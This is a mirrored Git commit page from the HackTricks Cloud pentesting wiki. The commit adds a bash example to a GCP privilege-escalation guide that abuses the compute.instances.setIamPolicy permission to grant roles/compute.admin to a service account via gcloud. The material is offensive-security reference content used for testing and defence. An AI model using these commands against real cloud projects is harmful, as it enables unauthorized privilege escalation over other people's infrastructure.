gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-05 20:40:18 -08:00
Code Issues Packages Projects Releases Wiki Activity

Update compute.instances.setIamPolicy

Browse Source 
Include an example for `compute.instances.setIamPolicy` by adding a role to a Service Account.
This commit is contained in:
1c3t0rm
2024-12-22 15:42:01 +01:00
committed by GitHub
parent 909a3378c2
commit cdbd8f9fd8
1 changed files with 17 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

18
pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
View File

@@ -57,7 +57,23 @@ This permission gives the **same privileges as the previous permission** but ove
### `compute.instances.setIamPolicy`
This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them.
This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them. Here is an example adding `roles/compute.admin` to a Service Account:
```bash
export SERVER_SERVICE_ACCOUNT=YOUR_SA
export INSTANCE=YOUR_INSTANCE
export ZONE=YOUR_INSTANCE_ZONE
cat <<EOF > policy.json
bindings:
- members:
- serviceAccount:$SERVER_SERVICE_ACCOUNT
role: roles/compute.admin
version: 1
EOF
gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE
```
### **`compute.instances.osLogin`**